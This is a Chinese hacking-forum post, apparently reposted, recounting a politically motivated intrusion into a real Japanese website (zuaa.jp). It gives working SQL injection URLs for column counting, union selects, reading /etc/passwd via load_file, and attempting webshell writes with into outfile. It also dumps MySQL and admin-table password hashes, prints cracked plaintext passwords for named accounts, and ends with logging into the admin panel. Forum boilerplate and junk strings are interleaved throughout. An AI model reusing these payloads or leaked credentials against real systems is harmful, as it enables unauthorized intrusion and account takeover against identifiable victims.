中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
. |/ j1 k5 ~, @! ~2 N. g* l: M
2 _. I# Y* W5 z/ H: z
0x01. 检测
www.zuaa.jp
收集数据
9 N$ H5 w# ~! ?, Y
[attach]73[/attach]
0 ^3 G4 G: m& i- X& y
* h- g0 k, ? _' ^) F$ o
whatweb
: e9 g+ V0 V9 ?+ L( Q( N
[attach]74[/attach]
3 _9 R4 A$ s! F6 T& e4 U$ L
; m/ F# \" @$ G! X+ l& }, @; @
利用NMAP扫描
( f+ O1 D- ?% V- [8 N
[attach]75[/attach]
9 e9 E7 c1 X& r; Z
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
/ ^; l6 \/ l5 `# w9 v8 V
0x02.找注入点
* b7 ^: w% E) U h; h, V5 c6 @( w
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
- M5 k' V" N1 k# R) ~( R
[attach]76[/attach]
8 p5 E6 j$ d& H* }& [% z4 p j
- K$ b( j P6 _& H+ ^1 x1 ^
0x03.order by
0 ?% T- l5 `5 F+ i# r3 M: G {/ H" W$ n
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
: F! i3 B8 }7 k6 a, ], a {8 u0 e
[attach]77[/attach]
& e+ w7 R/ E" F, l1 X
order by 28报错,order by 27正常
6 u- H* j8 N3 E1 ]( z: t: J- M! j
8 `) c9 }& L+ L$ m9 b! f! z4 R
0x04. union手动查询
; G0 k0 |2 J( ]$ `- p2 N4 y* \! b1 W
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) g+ T5 r3 g }1 S3 F
添加到 27 时正常显示
2 [# t, g3 M1 f7 y
[attach]78[/attach]
# e) p# e& e+ h( p5 H
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
c9 J! q/ M, p. U: [% h8 C7 B. u
Z/ ]- @/ ~' B* S9 s$ v+ c
0x05. info:
; C* R3 L& _& C( Y9 n0 g
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ U! D* @. \7 V: E6 h
[attach]79[/attach]
) X# N* z" d# X0 `* W: J
user: root@localhost
$ x+ W1 B* h. [
database: openpne
: F0 _+ N7 c! ^" O5 \
version: 4.1.22
) f- i4 Z& m5 k/ i: g3 X
os: portbld-freebsd5.4
3 o/ h; U7 i% ]: q+ i( @
7 P" s* T% b3 s! V- n
0x06. root用户
5 E: w6 B a' {: Y5 O( s
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
1 F' k6 T; h( k0 p
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) E1 y. o3 X, g5 G/ W9 |
[attach]80[/attach]
7 S& i2 O( `8 u# K
通过工具转换
9 j/ a7 q0 i1 l9 ^
[attach]81[/attach]
. P! z2 T/ l" j4 C
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
0 T, D+ x* Z# Z8 S5 b# U
* ]# j7 U* ?: f5 h! Z q$ K/ \4 I
0x07. 利用 into outfile
3 B9 W( ?0 U2 f/ R+ T
全部都失败
1 K1 o- Z0 b! I3 \& p$ S+ ]
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
# [! f1 k6 y6 m7 U0 V8 z
) ^+ R+ R' A( o
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
; ^# Z. R% P7 o; C1 J
+ G( b/ S# G% X( A
页面显示“MDB2 Error:syntax error”
2 M0 X9 w& V1 }
# P2 D# x1 h/ M8 \! e
0x08. 利用 mysql 4.1
. ?& B5 r1 j# a3 @. J# Q( x- m
猜常规表名,字段未果 工具 sqlmap
. j, o: \4 l& q
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
2 @, ^7 m$ l! v( ~7 O7 k8 `; B# s5 ?
8 p8 V+ V& T3 o- _( F2 T
[attach]82[/attach]
* y4 `+ v1 B7 k! C. H
. \) a4 S8 a& F" O8 Y Y. g3 v% h
0x09. 查找后台
$ O% d; d& G( e% r! Q8 ^
利用 现有的各种 后台工具尝试都不行
. q' |% \( |1 s4 y }6 {' K2 ~
$ d+ O& D- R3 J' _2 w8 a
0x10. MySL外联方法
5 ^% W1 l2 I' Q2 c9 f: n
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
0 Y- }. \/ s, u3 N; O0 s6 o+ g
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
. i( M& R) `' L. I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
. A; |1 B" W# a/ _
[attach]83[/attach]
3 Y6 _# J0 d) |) E! A4 `
这个可以在
www.cmd5.com
解密
" A# A1 E% O0 _ r5 i
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
D7 n6 u* Z5 X( o3 [1 Y- T
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
' I* U1 @+ H7 m/ _
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
% C3 o; |1 }* w X
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
/ }% L; T6 @( t a; t
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
# d1 Y% o# }, h; z5 S2 A6 s
[attach]84[/attach]
( v( a4 B& P2 z
$ |/ X: z8 p$ q+ U. l
0x11. 网站突破
3 Z! m: j$ S; ^% T1 S
发现网站的源程序 openpne, google 下载 openpne 源码
% ^6 d% d: @/ D' Y/ W+ P a
[attach]85[/attach]
K. v: h' N- X9 q
9 T# v+ p: G; t Y
0x12. 默认信息利用
' _8 z! N' b% Q6 V1 ^. Y+ C
http://sns.zuaa.jp/?m=admin&a=page_login
$ t& D6 L4 r6 H* [8 i/ E
[attach]86[/attach]
1 u# [# ?* H/ L) U
表名 (c_admin_user) ,字段名(username,password)
1 ]8 T" W @) m0 }; B
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
+ l9 w: [4 W' i4 s) O" _/ c
[attach]87[/attach]
6 {; J8 n6 g4 J$ p: }
解密
9 I8 B+ }4 h; G9 T) ^& p
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
/ A8 h6 Q! c+ K
zuaajp:c0923ec5857796a393da99905008c176, zju1897
) e8 h& ~# C! `% l4 o/ W. a
! S- D! H) T1 _0 _( v
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
+ S6 |7 a3 }# p N
8 h, ?6 J* N9 }3 h+ O, _
0x13. 登录后台
' e+ s. F' i6 R ~
[attach]88[/attach]
) N& G! `. I$ j% k/ j8 x$ [- H
- t: c' T E& Y- s- r% Q7 U3 ]
! `7 X; k, U# l& }* N1 p
0x14. 小结
! u9 ]3 v5 ?! u1 ~3 d/ ?5 X( s( `
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
5 T0 S: k* c, b _; y# G
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
; G; |* L) {& k. s8 J, i
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
7 A! F- v2 u! J( q' x
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
+ J3 U5 x0 a y' ?: a/ F7 O8 n7 j
5 R5 C! j/ J0 z; C9 q( ~0 {
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
/ h; h ]5 K! y6 U9 |
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2